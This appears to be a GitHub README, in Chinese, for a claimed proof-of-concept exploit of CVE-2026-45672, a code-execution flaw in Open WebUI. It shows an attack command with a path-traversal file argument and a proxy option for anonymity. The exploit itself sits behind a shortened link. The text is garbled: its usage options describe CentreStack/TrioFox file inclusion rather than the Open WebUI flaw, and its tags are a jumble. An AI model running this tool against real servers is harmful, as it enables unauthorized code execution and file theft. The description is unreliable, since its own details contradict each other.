CryptReaper12/CVE-2026-45672

GitHub: CryptReaper12/CVE-2026-45672

针对 Open WebUI 平台 CVE-2026-45672 漏洞的 PoC 利用工具,演示已认证用户如何绕过禁用代码执行的配置实现远程代码执行与文件读取。

Stars: 0 | Forks: 0

# CVE-2026-45672 ### 概述 旨在用于离线运行的 Open WebUI 平台包含一个安全缺陷,允许已验证的用户通过 `/api/v1/utils/code/execute` 端点执行任意 Python 代码,即使在配置设置中禁用了代码执行也是如此。此漏洞尤其令人担忧,因为 API 级别缺少功能门禁强制执行,这意味着尽管存在明确的“禁用”配置,仍可能发生未经授权的操作。用户应升级到 0.8.12 或更高版本以缓解此风险。 ### 环境要求 - Python 3.8+ - 依赖库:requests, argparse(通过 `pip install -r requirements.txt` 安装) ### 用法 - 安装依赖:`pip install -r requirements.txt` - 运行漏洞利用程序:`python exploit.py --target --file "/path/to/Web.config"` 选项: - `--target`:存在漏洞的 CentreStack/TrioFox 实例的 URL。 - `--file`:要包含的文件的相对路径(例如,用于测试的 "../../../../Windows/system.ini")。 - `--proxy`:用于匿名的可选 HTTP 代理。 ### PoC 漏洞利用 - [链接](https://tinyurl.com/5e3mybn8)
标签:API安全, CentreStack, CISA项目, CVE-2026-45672, HTTP代理, JSON输出, Open WebUI, PoC, Python, RCE, requests库, TrioFox, Web报告查看器, 任意代码执行, 任意文件读取, 安全漏洞, 数据展示, 无后门, 暴力破解, 权限绕过, 特征门控缺失, 红队, 编程工具, 网络安全, 路径遍历, 身份验证缺陷, 远程代码执行, 逆向工具, 隐私保护